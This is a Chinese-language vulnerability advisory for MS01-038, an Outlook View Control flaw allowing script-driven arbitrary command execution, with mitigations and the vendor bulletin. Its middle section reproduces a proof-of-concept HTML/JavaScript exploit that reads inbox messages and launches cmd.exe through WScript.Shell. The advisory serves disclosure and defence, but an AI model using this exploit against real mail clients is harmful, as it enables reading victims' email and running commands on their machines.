Microsoft Outlook 任意代码执行漏洞(MS01-038)
发布日期:2001-07-12
更新日期:2001-07-20
受影响系统:
Microsoft Outlook 98
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Microsoft Outlook 2002
Microsoft Outlook 2000
- Microsoft Windows NT 4.0
- Microsoft Windows 2000
描述:
BUGTRAQ ID : 3026
CVE ID :CAN-2001-0538
Microsoft Outlook存在安全漏洞,可能导致攻击者在目标系统上执行任意命令。
这主要是由于一个新的控件“Microsoft Outlook View Control”造成的,它声称自己
“safe for scripting”,但实际上却不是,所以导致了脚本对它的访问。
利用这个漏洞,攻击者可能在用户不知情的情况下利用脚本执行任意命令。
<*来源:Georgi Guninski (
guninski@guninski.com)
参考:
http://www.guninski.com/vv2xp.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (
guninski@guninski.com)提供了如下测试代码:
假设你的收件箱里不止有一封信:
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("f()",2000);
</script>
建议:
临时解决方法:
Russ Cooper (
Russ.Cooper@RC.ON.CA)提供了如下临时解
决方法:
安装Outlook电子邮件安全更新程序:
http://office.microsoft.com/downloads/2000/Out2ksec.aspx
配置Outlook,为所有外部邮件使用限制区域:
Outlook XP:
[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\General]
"Security Zone"=dword:00000004
Outlook 2000:
[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\General]
"Security Zone"=dword:00000004
Outlook 98:
[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Outlook\Options\General]
"Security Zone"=dword:00000004
禁止“Run ActiveX controls and plug-ins”选项
重命名或者删除“OUTLCTL.DLL“
检查邮件中的”<script>”,“<vbscript>”或 “<object>“标志,自动隔离或者使
用策略删除
厂商补丁:
微软已经为此发布了一个安全公告(MS01-038):
http://www.microsoft.com/technet/security/bulletin/MS01-038.asp
但是目前微软还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本。
浏览次数:4103
严重程度:0(网友投票)